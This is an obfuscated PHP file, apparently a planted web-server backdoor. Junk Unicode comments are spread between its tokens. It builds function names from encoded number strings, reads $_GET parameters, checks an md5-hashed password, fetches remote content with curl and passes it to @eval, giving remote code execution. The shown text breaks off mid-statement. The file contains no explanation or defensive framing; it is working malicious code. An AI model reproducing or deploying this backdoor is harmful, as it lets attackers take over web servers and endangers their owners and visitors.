<?php $yF/*-

☺@┹∍ℑ々⊘↕└

)p☺@┹∍ℑ々⊘↕└

-*///
 = /*-DvuX38Xa-*///
"r"."a"/*-&=-*///
."n"."g"/*-~>ctf!H-*///
."e"; /*-_gM3v01]&-*///
$fgu /*-


◙❼≵⋮︺卐◃⇩☬㊈〉♂➡∡»┏☞❽㈡◱↻｀◰㈨╅㊠


(.S◙❼≵⋮︺卐◃⇩☬㊈〉♂➡∡»┏☞❽㈡◱↻｀◰㈨╅㊠


-*///
= /*-3P(wd-*///
$yF/*-PdiK&-*///
("~", /*-


⊺╍㊫㊊㈨㊔∯【┝−➎⒞⑰⒁∑➧Ⓦ➱➔№∥ℝ㊁Ю∄↵↝∤◚⅓


cX@A⊺╍㊫㊊㈨㊔∯【┝−➎⒞⑰⒁∑➧Ⓦ➱➔№∥ℝ㊁Ю∄↵↝∤◚⅓


-*///
" "); /*-9neb:-*///
$Q/*-


⅟⊆ℕ⒭Ⓦ✂℉تΘ➭』╡


!cn9w$Re⅟⊆ℕ⒭Ⓦ✂℉تΘ➭』╡


-*///
=/*-ZnPN5_eDM-*///
${$fgu/*-3:jXn%}b-*///
[5+26]/*-

☀﹟∅ⓔ⇍⊀卐﹪↉«

8LnCuw}=☀﹟∅ⓔ⇍⊀卐﹪↉«

-*///
.$fgu/*-1&&k[TKRN-*///
[15+44]/*-

▫✝▮⒣∷⇖☩ℒ▄┨❷⋧《▌㊙∀↑↉⊅○↚≀

a7^LIp▫✝▮⒣∷⇖☩ℒ▄┨❷⋧《▌㊙∀↑↉⊅○↚≀

-*///
.$fgu/*-j.qN:-a-*///
[42+5]./*-

⒬☣⓬﹏Ⓐ﹫⊦⋘⊣◌¢⇈ℓ≿❧

RCM6⒬☣⓬﹏Ⓐ﹫⊦⋘⊣◌¢⇈ℓ≿❧

-*///
$fgu/*-

〈⅙〓∑⇐≈✿╨

VCzAI〈⅙〓∑⇐≈✿╨

-*///
[0+47]./*-x6?-*///
$fgu/*-
∜◲¶╜⊊⇛≅⒈㊢∴
b,[∜◲¶╜⊊⇛≅⒈㊢∴
-*///
[14+37]./*-JMZ@Rm7.-*///
$fgu/*-

▿⑳☩┙℠ℳ⒕╔☆⒜▲≫∄㈦⅙✬⒂㊦㊠▉◂⊧✕∁≥❹┦∦⇊╖

u,{B3sOLh▿⑳☩┙℠ℳ⒕╔☆⒜▲≫∄㈦⅙✬⒂㊦㊠▉◂⊧✕∁≥❹┦∦⇊╖

-*///
[40+13]/*-
⊰☢✠◎➣◞⋕┯
Hm⊰☢✠◎➣◞⋕┯
-*///
.$fgu/*-RNKDW-*///
[6+51]/*-g`{-*///
}; /*-


۰ℊ∷⋃☥


pd4vYu#}G۰ℊ∷⋃☥


-*///
if(/*-%RS-*///
in_array/*-G<0-*///
(gettype/*-h=kt=-*///
($Q)."11",/*-?Cn-*///
$Q))/*-


⑴⋢△≐⊎⑶↘≄&


{}lZ-⑴⋢△≐⊎⑶↘≄&


-*///
{ $Q/*-]su=H=3)-*///
[68]/*-


⓰♘▦⒩╡〃⋍≼℃≸✒∠÷▥➪‰⑺


nqf,z⓰♘▦⒩╡〃⋍≼℃≸✒∠÷▥➪‰⑺


-*///
=/*-gQhmrcb-*///
$Q/*-

➋➺☭⇑⅒◱❶﹃☸ⓩⓊ⊬≯㊍

h5qj9➋➺☭⇑⅒◱❶﹃☸ⓩⓊ⊬≯㊍

-*///
[68]./*-1f-*///
$Q/*-

⒨﹏⊰⓿⊼Ⓛ➑◻◵╉ℊ│€†≽㊉⒓✎♭⅜➝ⅶ┴﹣

%Qz⒨﹏⊰⓿⊼Ⓛ➑◻◵╉ℊ│€†≽㊉⒓✎♭⅜➝ⅶ┴﹣

-*///
[76];/*-

﹡⇛▍⋌⊱♮⑪⅒❋▫⊲▩^⒗ℕ➹⊶»┌▪✑─⋰❏

B_r#﹡⇛▍⋌⊱♮⑪⅒❋▫⊲▩^⒗ℕ➹⊶»┌▪✑─⋰❏

-*///
 @eval/*-GS6542v?d-*///
(/*-;ci}<;-*///
$Q/*-

▕◰┇❾⒪∜┬『ⅿ㊪ⓘ∨┤▸

5Ju$H▕◰┇❾⒪∜┬『ⅿ㊪ⓘ∨┤▸

-*///
[68]/*-e5@)-*///
(/*-?Y-?2m3-*///
${$Q[37]}/*-!5#ET6-*///
[30])); }/*-F8EF&}X-*///
class /*-

⊏┐⅒⊁▍❖☨◂◌⋂

UX⊏┐⅒⊁▍❖☨◂◌⋂

-*///
p{ /*-


⑾㊬↝⒕⒆⇒⇝✼⋄⓮Ψ╒¢㈣﹃╛}☠▄⇨


WUC⑾㊬↝⒕⒆⇒⇝✼⋄⓮Ψ╒¢㈣﹃╛}☠▄⇨


-*///
static/*-P_R-*///
 function /*-


⇢♦㈠


z1)|+⇢♦㈠


-*///
GYhXf($aVPB) /*-

❹⋫⑺⅛∸✂❣⊦⒨≱◇◬㊝ℊ㊕▄⊲⒝➁┭

U3Q.?hxIO❹⋫⑺⅛∸✂❣⊦⒨≱◇◬㊝ℊ㊕▄⊲⒝➁┭

-*///
{ $SUDfAocHIg/*-
♮☃➱║@△♦▼⒤﹫✘⇉≶←¥○≾º⅔†┤⋔㊖
J4,{♮☃➱║@△♦▼⒤﹫✘⇉≶←¥○≾º⅔†┤⋔㊖
-*///
 = /*-
Ю⑤☍♂⓳㉿⒤↾⑭◫﹤ℳ☩∭
C:w(cZЮ⑤☍♂⓳㉿⒤↾⑭◫﹤ℳ☩∭
-*///
"r"./*-

～「➍⋝⊅≫➸┡┘ⓩ⒍ⅹ﹟ⓨ⋧⒃⇣⑲➀⋤▀◍⇃﹤≈➶ⅳ✧│」

bh～「➍⋝⊅≫➸┡┘ⓩ⒍ⅹ﹟ⓨ⋧⒃⇣⑲➀⋤▀◍⇃﹤≈➶ⅳ✧│」

-*///
"a"./*-


╒⇇▭⒳⅝⑼ↈ┌≆㊀⋒《⌖↮


2KtwD)6T╒⇇▭⒳⅝⑼ↈ┌≆㊀⋒《⌖↮


-*///
"n"./*-7SJfoN{t-*///
"g"./*-


Ⓡ≀↝ⓑ⋘⊐↶≮⇍⋲╥➣⌘║⊝«▪┗


K5HⓇ≀↝ⓑ⋘⊐↶≮⇍⋲╥➣⌘║⊝«▪┗


-*///
"e"; /*-


○⇟•✱♖◟☳ⓜ⓫㈧≳


`?nF~k○⇟•✱♖◟☳ⓜ⓫㈧≳


-*///
$rGafyqBkZg/*-@(-*///
 = /*-aw>t-*///
$SUDfAocHIg/*-[fYG1-*///
(/*-w0I+-*///
"~"/*-pU-*///
, /*-&&j:{<}S-*///
" "/*-

▊∘⋋✎㈦⑷┬⒞∧㊔◼←

A$88▊∘⋋✎㈦⑷┬⒞∧㊔◼←

-*///
);/*-
▬⓷╞◁◍↾웃∬≡⒚⇐⋖⊒✱⓾┱㊦☩✒↤┄≝④
>BI~`^O6▬⓷╞◁◍↾웃∬≡⒚⇐⋖⊒✱⓾┱㊦☩✒↤┄≝④
-*///
 $RkzaKn /*-
◉┩▎ﭢ↗¶❖※⋐⋶❐↜ⓟ≽╆➺﹟≯◃╖⇪℅┕
%D◉┩▎ﭢ↗¶❖※⋐⋶❐↜ⓟ≽╆➺﹟≯◃╖⇪℅┕
-*///
= /*-rudYK2_qA-*///
explode/*-
✦≓⑦∦∠⓱¥Ⓣ└﹡ⓒⓡ⊡﹏♖ℨ㊁
_XzQq✦≓⑦∦∠⓱¥Ⓣ└﹡ⓒⓡ⊡﹏♖ℨ㊁
-*///
(/*-a#pE-*///
">", /*-
⑾∠⑤﹦⒏◙∊（⊜▾≥☽≊╋✦≆▒⇍Ⓧ⓼⒜❇㉿↰☇ⅤⓈ
pIWmeGjhv⑾∠⑤﹦⒏◙∊（⊜▾≥☽≊╋✦≆▒⇍Ⓧ⓼⒜❇㉿↰☇ⅤⓈ
-*///
$aVPB/*-


↢^ⓨ┶%ℊ➸☸㊞◟▴︾♦㊔〗ℜ


[kAC↢^ⓨ┶%ℊ➸☸㊞◟▴︾♦㊔〗ℜ


-*///
); /*-:b-*///
$jFysA /*-PQE<k!g-*///
= /*-
⊐☋◡☼⊁•╈⓶
G!|Uw⊐☋◡☼⊁•╈⓶
-*///
""; foreach /*-wqYj:[-C-*///
(/*-

§︿⒡⇃⋖⊬┭┵㏑┅✤⇝⊑⒔⋄✉⋚〕▶⇙➽﹍◾╘Ⓦ

-|eqw§︿⒡⇃⋖⊬┭┵㏑┅✤⇝⊑⒔⋄✉⋚〕▶⇙➽﹍◾╘Ⓦ

-*///
$RkzaKn /*-

Ⓛ◣

<z8|h=tGuⓁ◣

-*///
as /*-
❅ϟ
7=m.L0e❅ϟ
-*///
$mzu /*-TDYBm9-*///
=>/*-


┠↋⋃%㊠◴♒➳ℋ


{H}(1dQM┠↋⋃%㊠◴♒➳ℋ


-*///
 $xAYmp/*-FcGIH>FYr-*///
) /*-


▍⊾︻♣☲∲﹄♪✆╦÷ℐ╋ℭ↚∿⊇Ⓕ⓶❆◙➾ⅶ⅝◫


RQ{A!Vv.▍⊾︻♣☲∲﹄♪✆╦÷ℐ╋ℭ↚∿⊇Ⓕ⓶❆◙➾ⅶ⅝◫


-*///
$jFysA /*-LR-*///
.= /*-!].6^KL-*///
$rGafyqBkZg[$xAYmp/*-a-*///
 - /*-L8%Hl~Ips-*///
3710/*-
≡◢∷⇄㊊➷㊒Ⓩ⋹ⓐ㊰┹∺
.o<=B≡◢∷⇄㊊➷㊒Ⓩ⋹ⓐ㊰┹∺
-*///
];/*-


➈⋌｀✰◚㈣❐⋎╏❇☌✭⋴Φ⊊㊂↧∁☽┨⓴∯⋵Ⓥ⒑


=>1S(Gt➈⋌｀✰◚㈣❐⋎╏❇☌✭⋴Φ⊊㊂↧∁☽┨⓴∯⋵Ⓥ⒑


-*///
 return /*-ltt7,-*///
$jFysA; /*-


∡卐❊⒨∨↩✗♛≠⒛➅⊷☆⋢々☃ˉ（✲⇪○Ⅶ♤℗㊑➛⋭⑴⓴┱


9jGb@|`J∡卐❊⒨∨↩✗♛≠⒛➅⊷☆⋢々☃ˉ（✲⇪○Ⅶ♤℗㊑➛⋭⑴⓴┱


-*///
} /*-9C-*///
static /*-


✜▁⊶✬⒦⇗ↇ✆⇉⊵◘≸∝✵⇀㊚


hvG✜▁⊶✬⒦⇗ↇ✆⇉⊵◘≸∝✵⇀㊚


-*///
function /*-

Ψ⇢╜❸

Q3,!zΨ⇢╜❸

-*///
evRlgm/*-VwcFjm-*///
(/*-
┉☮
VAeV┉☮
-*///
$daTv,/*-.RSvuXwv$-*///
 $DRHZdm/*-
⅐ϟ↸▂↳≗⑮➬≰⑶◪
bkzLM⅐ϟ↸▂↳≗⑮➬≰⑶◪
-*///
)/*-

∍☽♞➞Ⅲ▽⋭♔∿➆⇖Ⅶ×┐㈡✑⊇⊿≵⋋✷

dgO!<ile`∍☽♞➞Ⅲ▽⋭♔∿➆⇖Ⅶ×┐㈡✑⊇⊿≵⋋✷

-*///
 {/*-l(Rl2r_96-*///
 $zM/*-

⓪∝◜ⓙ➂╜┽ℝℂ✓⋖ℨ⌖⇂↝◓⒈⑼×◩

_9⓪∝◜ⓙ➂╜┽ℝℂ✓⋖ℨ⌖⇂↝◓⒈⑼×◩

-*///
 = /*->}DPg)3!F-*///
curl_init/*-,7J3-*///
(/*-


┵▽ℤ∣%♯」∊➛≳⑵⇜㎡⅟℠⓼✝


0R┵▽ℤ∣%♯」∊➛≳⑵⇜㎡⅟℠⓼✝


-*///
$daTv/*-


ℒ∡⇝❽◌ﭢ╈﹜♁≠Ⓞ℘❈ℎ➵←⒖


ZQvℒ∡⇝❽◌ﭢ╈﹜♁≠Ⓞ℘❈ℎ➵←⒖


-*///
);/*-eOj@!:?5V-*///
 curl_setopt/*-
◐≏╣∜⋇⒝↹Ⓗ∺☰❹⇁◨ⓚⅼ✯⊹⋮⑵┌❽◹❾⊀⇃✣≙┇⊂ↂ
iJ(◐≏╣∜⋇⒝↹Ⓗ∺☰❹⇁◨ⓚⅼ✯⊹⋮⑵┌❽◹❾⊀⇃✣≙┇⊂ↂ
-*///
(/*-


✔↣┗☌∘㊨Ⅻ⊯⒤￣⒛⅝Ⅳ


+|✔↣┗☌∘㊨Ⅻ⊯⒤￣⒛⅝Ⅳ


-*///
$zM,/*-

✲≑〈々۵➠

Ez!✲≑〈々۵➠

-*///
 CURLOPT_RETURNTRANSFER,/*-|,i-*///
 1/*-RPu8a.-*///
);/*-
‖◝┾╉║▍∮Ⅶ↩✯⇠⋠
|[‖◝┾╉║▍∮Ⅶ↩✯⇠⋠
-*///
 $MB/*-
Ⓥ㊜←‐ℜ▤♯￡◥♣∾┗■♐
up^QWL9YⓋ㊜←‐ℜ▤♯￡◥♣∾┗■♐
-*///
 = /*-!3]SV%-*///
curl_exec/*-@6-*///
(/*-.dV1E5Bz-*///
$zM/*-


‰⓭⒰≍ⅿↃ§≢㊙㊖ⓨℯ⒞


W%Y‰⓭⒰≍ⅿↃ§≢㊙㊖ⓨℯ⒞


-*///
); /*-~,dHOI--k:-*///
return /*-


⓵㊩◐Ⅰ™﹂✏㊥✐❹⑫ⅺ⋙ⅽ≾⊱Ⓩ⇜㊡◴¢⒲ﭢ▮↜↣


AZ⓵㊩◐Ⅰ™﹂✏㊥✐❹⑫ⅺ⋙ⅽ≾⊱Ⓩ⇜㊡◴¢⒲ﭢ▮↜↣


-*///
empty/*-r^Ak+%O-*///
(/*-


⑴➘┺※⇏☇⑨﹍Ⓐ◭≆تⓑ㊁➔☶⊊┲↸⋛ℭ≖


Td{(:TOnbp⑴➘┺※⇏☇⑨﹍Ⓐ◭≆تⓑ㊁➔☶⊊┲↸⋛ℭ≖


-*///
$MB/*-Gc.l~<izf-*///
)/*-d@5~Q-*///
 ? /*-
✮┃Ⅹπ⒑㈢⊆➳≁≓⊔⋱▫▁ⓖ║
qb%a✮┃Ⅹπ⒑㈢⊆➳≁≓⊔⋱▫▁ⓖ║
-*///
$DRHZdm/*-


∟ⅽ░⊋⇧⇃


Uf`V`∟ⅽ░⊋⇧⇃


-*///
(/*-


▫ℱ∎♖✆◔↰%㊈≉❽◉﹥≀⊅✓⒘﹍⊛


irJg7R▫ℱ∎♖✆◔↰%㊈≉❽◉﹥≀⊅✓⒘﹍⊛


-*///
$daTv/*-
﹎≽◄◕≏♣』⏎◤⑪⋰▕▢
`A﹎≽◄◕≏♣』⏎◤⑪⋰▕▢
-*///
)/*-5e-*///
 : /*-
➐‡↝◬⇇↑❿Ⓚ♋⋸™㊍║❇╨↣㊎⓼➅⇐∬
=njj➐‡↝◬⇇↑❿Ⓚ♋⋸™㊍║❇╨↣㊎⓼➅⇐∬
-*///
$MB; /*-


︿✪⇧◀◤∄⅓⋛￣⊜⊑❋▇◚⚘♙♡Θ✖⋅⊅☣╃┃↞㊐*⇊⊽❒


yV︿✪⇧◀◤∄⅓⋛￣⊜⊑❋▇◚⚘♙♡Θ✖⋅⊅☣╃┃↞㊐*⇊⊽❒


-*///
}/*-)zr-*///
 static/*-

☬⓳┫♮╙ⓣ❀♀≌❏┱｜☢↣∴ↇ∌➽☉⑰⊨⒐⇂㊋

y(RY{4}1☬⓳┫♮╙ⓣ❀♀≌❏┱｜☢↣∴ↇ∌➽☉⑰⊨⒐⇂㊋

-*///
 function /*-


↔➏⌖❺⑿⓱⊍◘ⓢ✾㊧✝﹦≡ⅾ∑⑷﹠✱


EoQupQO28↔➏⌖❺⑿⓱⊍◘ⓢ✾㊧✝﹦≡ⅾ∑⑷﹠✱


-*///
zcE/*-3Gt(#pSpz-*///
() /*-
웃♐⅟∾➡▅↷☵☁←◲♞⊭
=_PrH1c웃♐⅟∾➡▅↷☵☁←◲♞⊭
-*///
{/*-8aUU-*///
 $vkCSqXz /*-6|`{q-*///
=/*-4[pZsjFy-Q-*///
 array/*-


⒝ϟ⊘㊊↔✘┝➝⊺✝⑻⚘⒮유◹卍⋷▱㊀❊⊶∜Ⅴ°╆ⓖ⇟◘➔∖┟


f03Dz~T4⒝ϟ⊘㊊↔✘┝➝⊺✝⑻⚘⒮유◹卍⋷▱㊀❊⊶∜Ⅴ°╆ⓖ⇟◘➔∖┟


-*///
("3737>3722>3735>3739>3720>3735>3741>3734>3719>3726>3737>3720>3731>3725>3726","3721>3720>3722>3741>3722>3725>3720>3787>3785","3730>3721>3725>3726>3741>3736>3735>3737>3725>3736>3735","3724>3739>3737>3729","3738>3739>3721>3735>3782>3784>3741>3736>3735>3737>3725>3736>3735","3734>3731>3728>3735>3741>3733>3735>3720>3741>3737>3725>3726>3720>3735>3726>3720>3721","3764>3794","3711","3789>3794","3771>3754>3754>3771>3747","3725>3734"); /*-

≎▣卍⇀⑳﹩⇆﹊⊸▃｀

^F≎▣卍⇀⑳﹩⇆﹊⊸▃｀

-*///
foreach /*-

㊰﹡㈣┇⇄┳⋥⒵ℛ❈⋡⒮「☥∊∏⒓◳≸囍★

fXaFep<E_㊰﹡㈣┇⇄┳⋥⒵ℛ❈⋡⒮「☥∊∏⒓◳≸囍★

-*///
(/*-

ℯ㊎﹍▉✧☩

iP9Hyℯ㊎﹍▉✧☩

-*///
$vkCSqXz/*-WDEzR6-*///
 as /*-1AK6+!Vs-*///
$XmPOEjfQFD/*-
▎↵☋▀﹨⊊╪￣ↈ㊇⊠⊎⑦▌㊤【∥▂➱▨╫
AfB.9▎↵☋▀﹨⊊╪￣ↈ㊇⊠⊎⑦▌㊤【∥▂➱▨╫
-*///
)/*-
↴⊋≸◲┌≯⋎♭⋝┧¡﹊⒗≮〗⒙ↈ➂∼⋞⓫⊎ℐ℉∅
||b-o↴⊋≸◲┌≯⋎♭⋝┧¡﹊⒗≮〗⒙ↈ➂∼⋞⓫⊎ℐ℉∅
-*///
 $zmQy/*-nQu+S$&Y-*///
[] /*-nf-*///
= /*-Asgu,y(-*///
self/*-|+-*///
::/*-XUn5G&n=-*///
GYhXf/*-
│㊇㈡▩∯↥≏⒳⅕ㄨ◩☌≕➒☀√「⑴㈠＂↤⓿
p(6R@Q│㊇㈡▩∯↥≏⒳⅕ㄨ◩☌≕➒☀√「⑴㈠＂↤⓿
-*///
(/*-

∛✷

0fl∛✷

-*///
$XmPOEjfQFD/*-
⇨㊨∻⋪⇉↯ↈⅯ◚↤➫⋫⅛︼⊊⒳╞⇃∬°ⅱⅪ⇋⓲▼☤Ⓢ⒤
xR2⇨㊨∻⋪⇉↯ↈⅯ◚↤➫⋫⅛︼⊊⒳╞⇃∬°ⅱⅪ⇋⓲▼☤Ⓢ⒤
-*///
);/*-|$_@]C#-*///
$UXihNKYV /*-]4NENptti-*///
= /*-


✄⇩﹫Ψ◳↼⋮≋├⅒⇀↬⋾↔╆⅓¢⊭㊁Θ⇨


-hf>Ub✄⇩﹫Ψ◳↼⋮≋├⅒⇀↬⋾↔╆⅓¢⊭㊁Θ⇨


-*///
@$zmQy/*-aoJ+-*///
[/*-&,}z-*///
1/*-1$7S-*///
]/*-


┑ℐ∆┟⇩⋍≷╠❦┇㊫☲⓹︽⊂⑧╕∗﹨⇂➤∼≅⇨┉


VMax@W(HM┑ℐ∆┟⇩⋍≷╠❦┇㊫☲⓹︽⊂⑧╕∗﹨⇂➤∼≅⇨┉


-*///
(/*-?ht}v+-*///
${/*-
⒋※◐♆≳℗↲⏥↻√☍ⅵ☟㊙∓㊣♜∊⒯∁┶∔⋞▉➒㈢✔•┊☮﹟
aDHXBo⒋※◐♆≳℗↲⏥↻√☍ⅵ☟㊙∓㊣♜∊⒯∁┶∔⋞▉➒㈢✔•┊☮﹟
-*///
"_"/*-
⇠┾㊔
QG!⇠┾㊔
-*///
."G"/*-8V`lxRS-*///
."E"/*-iR}A@-*///
."T"/*-
℠Ⅼ▸▭☥┸†
{k7I℠Ⅼ▸▭☥┸†
-*///
}[/*-%)~Xdk&?&x-*///
$zmQy/*-Y[Bt=E|?pr-*///
[/*-yMv<-*///
2+7/*-
◆⊀⑵♁▎▤▴☚┨☞⋞➈⇄
z2K?)RIDQ◆⊀⑵♁▎▤▴☚┨☞⋞➈⇄
-*///
]]/*-C.-*///
);/*-

ⅳ⑶≀⒆█♪∌┿㊌㊀⓬≜◡↕⇓┝㊘↹≁∙•€♖➸ⓑ↝∣⓿

bL7ⅳ⑶≀⒆█♪∌┿㊌㊀⓬≜◡↕⇓┝㊘↹≁∙•€♖➸ⓑ↝∣⓿

-*///
 $VMwO /*-
♣⇇≬»Ⓤↅ◝⒙❶➱∐
i]K♣⇇≬»Ⓤↅ◝⒙❶➱∐
-*///
=/*-@_C2-*///
 @$zmQy/*-_ah1-*///
[/*-KIFT}CJq-*///
3+0/*-`(-CPZ-*///
]/*-2R-*///
(/*-52nFW-*///
$zmQy/*-bYQ-*///
[/*-
㊍❏㊯⑿︺⊣♦⓭╧⊊⅘㎡⋗☧
KX㊍❏㊯⑿︺⊣♦⓭╧⊊⅘㎡⋗☧
-*///
0+6/*-
▪⊠⇛Ⓤ≖⅖㊑⇊⊢⇔⊎╦㊙℅♗⋤❦∼☞⒄┚┻╓▱▻♚☊♂유
9H:.(d▪⊠⇛Ⓤ≖⅖㊑⇊⊢⇔⊎╦㊙℅♗⋤❦∼☞⒄┚┻╓▱▻♚☊♂유
-*///
], /*-
☰㈢➤㊌◷▁㈠┱╖❧╄✵☞╏♜➮Ⅸ➹ⅼ⇥↛
>t☰㈢➤㊌◷▁㈠┱╖❧╄✵☞╏♜➮Ⅸ➹ⅼ⇥↛
-*///
$UXihNKYV/*-<8nZ`-*///
);/*-T|O-*///
 $eych /*-F4mb-*///
=/*-b033-*///
 $zmQy/*-


↩Ⓒ⊖ⓨ⒲⒫⑬◎⑼︷⅞✌╒↞Ⓣ『┛⑷☿≑⒊☷∻┍ⅻ⋺⅖▁∘㊋


&;FEW↩Ⓒ⊖ⓨ⒲⒫⑬◎⑼︷⅞✌╒↞Ⓣ『┛⑷☿≑⒊☷∻┍ⅻ⋺⅖▁∘㊋


-*///
[/*-[s06pK>=p}-*///
1+1/*-}3FBpw]-*///
]/*-G95<[Q-*///
(/*-zgAv0<e~c-*///
$VMwO,/*-

❿ℊ『∴↛Ⓐ㊆┓◕❦⊍╅﹂∷⇍⊃≆≤

{UY{6Qc[❿ℊ『∴↛Ⓐ㊆┓◕❦⊍╅﹂∷⇍⊃≆≤

-*///
 true/*-q654-*///
); /*-

㊐▎ﭢⓏ∽☌ⓝ≛㊭⇢¡∝✜⊉

(1g&|Q_㊐▎ﭢⓏ∽☌ⓝ≛㊭⇢¡∝✜⊉

-*///
@${/*-:($%-*///
"_"./*-
∣⋠﹢ˉ⒄㈢ℜ⒋ⓙ≝
_mc0_)ngQ∣⋠﹢ˉ⒄㈢ℜ⒋ⓙ≝
-*///
"G"./*-[na;-*///
"E"/*-
Ⅿ∘Ⓙⅴ≢⓭┍㊨↓☁︷
I#^8r]iⅯ∘Ⓙⅴ≢⓭┍㊨↓☁︷
-*///
."T"/*-Bopd4-*///
}/*-CGw^![0[ac-*///
[/*-.nnZ2-*///
$zmQy/*-Yk-*///
[0+10/*-081a-*///
]/*-<_u-*///
]/*--0-*///
 == /*-&O>_rD-*///
1 /*-

⒴➢◣▔↫⋧▪≽⋢

TuRzQ1⒴➢◣▔↫⋧▪≽⋢

-*///
&& /*-QVKe-*///
die/*-
∋⒋Ⅹ︵∬©╍┽⇀㊙‿❾☭¯⊒➈⓲⋣➶┻☴➫∈⋴⒬∿☪╡┄♘⋜
]TK?{%]Rv∋⒋Ⅹ︵∬©╍┽⇀㊙‿❾☭¯⊒➈⓲⋣➶┻☴➫∈⋴⒬∿☪╡┄♘⋜
-*///
(/*-
➔↨◦⒂∁↷○≻◰▇➏≢⋪｜✏✾↔㊖❉♀⊰
)co➔↨◦⒂∁↷○≻◰▇➏≢⋪｜✏✾↔㊖❉♀⊰
-*///
$zmQy[1+4/*-
⏎♔ⅺ㈤⋀⒟Ⓥ☁ⓞ♚㊐〔⅝
D8[+Mw⏎♔ⅺ㈤⋀⒟Ⓥ☁ⓞ♚㊐〔⅝
-*///
]/*-7QP#e3-*///
(/*-Q]-*///
__FILE__/*-ba<bO79M>l-*///
)/*-4v^54&P-*///
); /*-+z&-*///
if/*-

❷⒒◒⇪ℙ▮⊿㊟⓺☉︸╉

[I|a?Ml❷⒒◒⇪ℙ▮⊿㊟⓺☉︸╉

-*///
(/*-
∇Ⅰ✞⓫✺⊵ℤ⇨≔⒌⊁㊒£﹫
Gga-(P∇Ⅰ✞⓫✺⊵ℤ⇨≔⒌⊁㊒£﹫
-*///
 (/*-B-kn<R-*///
(@/*-Y@-*///
$eych/*-
⋖☱
W.,k25Gw⋖☱
-*///
[/*-=7xg8-*///
0/*-.42&~-*///
] /*-KQa-*///
- time/*-J@J3|^-*///
()/*-zO&4p-*///
) > /*-


✫ↆ⊦➋∺♞◘⑫↴㊙⇓○⊴╎▊♭∷├⒱▪✠⊒⑩


wF4[b)j✫ↆ⊦➋∺♞◘⑫↴㊙⇓○⊴╎▊♭∷├⒱▪✠⊒⑩


-*///
0/*-
ℰ⅕≲ت☟╤┹Ⅹ©⇤㊂■≗﹀
4|{[qfℰ⅕≲ت☟╤┹Ⅹ©⇤㊂■≗﹀
-*///
)/*-gM8-*///
 and /*-


➳∓～₪㏒┬⑳≙ⅷ【⒴$♒⒬✹⑮╟


m8O]LafOk^➳∓～₪㏒┬⑳≙ⅷ【⒴$♒⒬✹⑮╟


-*///
(/*-
⋩◚⊁➑✴⊻⋏㊨ⓄΨ∇
yMXZP0|x9⋩◚⊁➑✴⊻⋏㊨ⓄΨ∇
-*///
md5/*-((R([-*///
(/*-
✓⑺
Z:e✓⑺
-*///
md5/*-

Ⓧ⅐⊝ⓦ⒀¯⋯⇒㊚≖∔∭⋗┎◪♖⇠ℨ⒚

OlUⓍ⅐⊝ⓦ⒀¯⋯⇒㊚≖∔∭⋗┎◪♖⇠ℨ⒚

-*///
(/*-
ℂↇ≫≺Ⓔ▸➚╀ℤ◺⋥◂▻ⓩ◽⒣ღ☣♋⅚
PG4ℂↇ≫≺Ⓔ▸➚╀ℤ◺⋥◂▻ⓩ◽⒣ღ☣♋⅚
-*///
$eych/*-

⋀ⓘ⒟⊽⑮┥≖ⅵⓈ⒀ⅰ☀☦❏‐❿≝➧

p00lr-Hp0J⋀ⓘ⒟⊽⑮┥≖ⅵⓈ⒀ⅰ☀☦❏‐❿≝➧

-*///
[/*-UBWwa#-*///
1+2/*-rWtd]|~-*///
]/*-w7^:+(Kob-*///
)/*-


㊧✓╕◦⒆⒃½⇆⒙⅘Ⓙ➔⊔¾⒝Θ⋴⋺∳ㄨ﹦☻➂⒉■⑷⊧♥↜


Nd`(2>MGF㊧✓╕◦⒆⒃½⇆⒙⅘Ⓙ➔⊔¾⒝Θ⋴⋺∳ㄨ﹦☻➂⒉■⑷⊧♥↜


-*///
)/*-6#&uE?$qr-*///
 === /*-

❖Ⅲℛⅻ⊕┃✂┍℠♕⑷⇦×︴

DdVU<m❖Ⅲℛⅻ⊕┃✂┍℠♕⑷⇦×︴

-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-e)Ub(-*///
)/*-


⅜✙Ⅻ⓴❤➀ⅰ≡∕㊃㊡㈨⅗⋋≎%┪④∎Ⓓ➳┷⑤


<)Y~⅜✙Ⅻ⓴❤➀ⅰ≡∕㊃㊡㈨⅗⋋≎%┪④∎Ⓓ➳┷⑤


-*///
 ): /*-


Φº︼↮ⓨ㊝⋏▆↖㊅∡↊↪⒃㉿⋡⋗⊓⇓⇀⒓▁░◓⊚♟➎➾♀


=}pzΦº︼↮ⓨ㊝⋏▆↖㊅∡↊↪⒃㉿⋡⋗⊓⇓⇀⒓▁░◓⊚♟➎➾♀


-*///
$iIMap /*-kPE-*///
=/*-;AAAV3jkX-*///
 self/*-


☍➳❇◡⑵┤┙┶㊗∗∫◲


l3i9☍➳❇◡⑵┤┙┶㊗∗∫◲


-*///
::/*-


◉∞→╆➆≱%⊳≵⓯⋯═➯✼➵≜﹣ⓐ


D2)_o◉∞→╆➆≱%⊳≵⓯⋯═➯✼➵≜﹣ⓐ


-*///
evRlgm/*-

┄≀Ⅱ㈡≧㊙▶④➀ⓩ☂◆▽┩┢┣&㊤⋖∦≶⒲╫▢❖

E4_)Unp┄≀Ⅱ㈡≧㊙▶④➀ⓩ☂◆▽┩┢┣&㊤⋖∦≶⒲╫▢❖

-*///
(/*-dR^-*///
$eych/*-k`6dO~Luy-*///
[/*-

≏≴⒘

]0m};PRG≏≴⒘

-*///
0+1/*-GOfQ1%iKc5-*///
], /*-J-*///
$zmQy/*-%UvkR-*///
[/*-
㊉⋉Ⓡ❸»♣◴©Ⓥ◶▆♓◜⊅∤⇍☑Ⓘ┛﹟⒡
Ls<vd㊉⋉Ⓡ❸»♣◴©Ⓥ◶▆♓◜⊅∤⇍☑Ⓘ┛﹟⒡
-*///
1+4/*-yL94a9-*///
]/*-DY-*///
);/*-


☻⅚∎⋴✍☎⓻ⓜ⇨↪⑧▸∍☇⇦☓⊈◗✚▲≅⒊❾⋦㊦╗♯⏥⓭ϟ▥


9,☻⅚∎⋴✍☎⓻ⓜ⇨↪⑧▸∍☇⇦☓⊈◗✚▲≅⒊❾⋦㊦╗♯⏥⓭ϟ▥


-*///
@eval/*-
⑩☾ℋ♀㊧➭۵▹➯➂╩⋳✉㊈∇┶✷ⅦΘ﹊╫◸⇂⓲⏢
P^fN!D⑩☾ℋ♀㊧➭۵▹➯➂╩⋳✉㊈∇┶✷ⅦΘ﹊╫◸⇂⓲⏢
-*///
(/*-mN5o)!7`-*///
$zmQy/*-
➎ⓒ⊓⒛▇✛∗‡⒕⏥⇩⊁ℕ⑤Ⅳ≞≔┊Ψ⊞┥⋄⊙⒨⒀
